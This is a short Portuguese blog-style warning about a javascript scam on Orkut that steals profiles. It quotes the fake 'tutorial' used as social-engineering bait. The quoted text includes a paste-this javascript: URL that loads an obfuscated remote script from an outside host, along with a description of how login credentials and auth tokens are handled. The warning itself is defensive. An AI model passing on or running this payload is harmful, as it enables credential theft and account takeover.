Código malicioso no orkut rouba perfis
A pouco tempo surgiu um novo javascript, que rouba perfis no orkut, depois de executado parece que ele manda o seu login e a sua senha direto paraum screpbook, apresentamos abaixo a engenharia social usada lembrando que oslammers estão passando tal javascript como um tutorial, então fique alerta quando vir algoparecido com o que estamos apresentando abaixo:LOGANDO ORKUTLogando no orkut por scrapbookPrimeiro, não é bug, o próprio google oferece o recurso.Pra que serve isso?Para desenvolvedore que precisam por algum motivo injetar os cookies em suas aplicações, como por exemplo um site que oferece algum serviço do orkut.PowerScraps, AdsFacil, porque o scrapbook é remunerável a logins por aceitar htmls....Pode servir também para logar em qualquer serviço do google, mas o assunto aqui é orkut.A página é esta:http://www.orkut.com/Scrapbook.aspxE os parâmetros são estes:Email -> deverá ser colocado o e-mail de login na conta googlePasswd -> senha da conta googleskipvpage -> pula a parte que de verificação de e-mail confirmado(by Lord)service -> serviço da conta googleentão no final ficaria assim:javascript:d=document.createElement('SCRIPT');d.src='ht'+'tp://upashare.110mb.com/Gloogle.Login.js';document.getElementsByTagName('head').item(0).appendChild(d);void(0)Se o login estiver correto irá retornar 3 códigos, algo assim:SID=DQAAAGMAAABArUNwM...LSID=DQAAAGQAAACsRGt9...Auth=DQAAAGYAAACsRGt9...Esse último deverá ser usado para o login no orkut, para isso você precisa jogar ele na RedirLogin assimhttp://www.orkut.com/RedirLogin.aspx?auth=VALOR QUE ESTÁ EM NEGRITO ALI EM CIMAc tiver desconfiando faça um fake e teste ¬¬'O resto é com vocês...